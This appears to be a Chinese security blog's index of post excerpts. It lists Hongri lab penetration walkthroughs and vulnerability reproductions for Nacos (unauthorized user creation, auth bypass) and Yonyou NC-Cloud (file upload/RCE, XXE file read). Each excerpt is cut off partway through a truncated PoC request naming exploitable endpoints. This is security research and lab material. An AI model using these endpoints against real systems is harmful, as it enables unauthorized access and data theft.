红日靶场2-渗透过程
摘要:
一、环境搭建 注意:靶机通用密码: 1qaz@WSX 这里设置两个网卡 三台虚拟机配置如下: kali机:192.168.230.131(VMnet8 网卡随机分配的IP) PC机:192.168.230.201(外网ip),10.10.10.201(内网ip) DC机:10.10.10.10(域控
红日靶场1-渗透过程
摘要:
一、环境搭建 说明:虚拟机所有初始密码都为hongrisec@2019(后面需要改密码,自己设置) 这里设置两个网卡,配置如下: 三台虚拟机以及攻击机ip如下: kali机:192.168.230.131(VMnet8 网卡随机分配的IP) win7:192.168.230.153**(外网ip)*
Nacos未授权添加用户漏洞
摘要:
影响范围: Nacos <= 2.0.0-ALPHA.1 漏洞复现: 检测漏洞是否存在 POC: /nacos/v1/auth/users?pageNo=1&pageSize=4 接下来可以尝试创建用户,useragent写成Nacos-Server POC: POST /nacos/v1/auth
Nacos token.secret.key 身份绕过漏洞
摘要:
影响范围: 0.1.0 <= Nacos <= 2.2.0 漏洞复现: POC: POST /nacos/v1/auth/users/login HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; r
用友-NC-Cloud存在任意文件上传/RCE
摘要:
漏洞复现: 首先上传jsp POC: POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 Host: IP User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, l
用友-NC-Cloud存在soapFormat-XXE 导致任意文件读取漏洞
摘要:
漏洞复现: POC: POST /uapws/soapFormat.ajax HTTP/1.1 Host: ip User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0